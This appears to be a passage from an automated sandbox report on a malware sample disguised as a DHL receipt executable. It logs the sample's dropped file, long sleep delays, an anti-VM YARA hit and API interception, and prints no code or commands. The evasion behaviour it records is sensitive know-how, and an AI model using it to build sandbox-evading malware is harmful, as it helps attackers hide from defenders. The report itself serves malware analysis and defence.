Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: nlvpnyUnaRqfA.exe PID: 6764, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: 16C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: 33D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: 5A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: 6A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: 6B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: 7B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: C480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: D480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: D910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: E910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory allocated: 1810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory allocated: 3350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory allocated: 30D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory allocated: 58D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory allocated: 68D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory allocated: 6A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory allocated: 7A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory allocated: BDD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory allocated: CDD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory allocated: D260000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_019D096E rdtsc

9_2_019D096E

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239890	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239773	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239656	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239535	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239414	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239297	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239187	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239038	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 238739	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 238573	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 238250	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 238140	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 238031	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237922	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237812	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237703	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237592	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237484	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237375	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237265	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237156	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237047	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236922	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236812	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236703	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236593	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236484	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236375	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236265	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236156	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236047	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235922	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235812	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235692	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235562	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235452	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235343	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235232	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235109	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 234984	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 234861	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 234719	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 234568	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 234442	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 234312	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 239750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 239484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 239229	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 239109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238929	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238340	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238124	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238005	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237888	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237558	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237222	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236981	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236873	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236751	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236503	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236378	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235983	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235874	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235763	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235526	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235383	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235274	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 234988	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 234841	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 234551	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 234396	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Window / User API: threadDelayed 4970	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Window / User API: threadDelayed 3185	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2828	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Window / User API: threadDelayed 2807	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Window / User API: threadDelayed 4209	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Window / User API: threadDelayed 4427
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Window / User API: threadDelayed 5546

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 0.7 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 0.3 %

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -239890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -239773s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -239656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -239535s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -239414s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -239297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -239187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -239038s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -238739s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -238573s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -238250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -238140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -238031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -237922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -237812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -237703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -237592s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -237484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -237375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -237265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -237156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -237047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -236922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -236812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -236703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -236593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -236484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -236375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -236265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -236156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -236047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -235922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -235812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -235692s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -235562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -235452s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -235343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -235232s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -235109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -234984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -234861s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -234719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -234568s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -234442s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 576	Thread sleep time: -234312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 3128	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6436	Thread sleep count: 2828 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3648	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4508	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
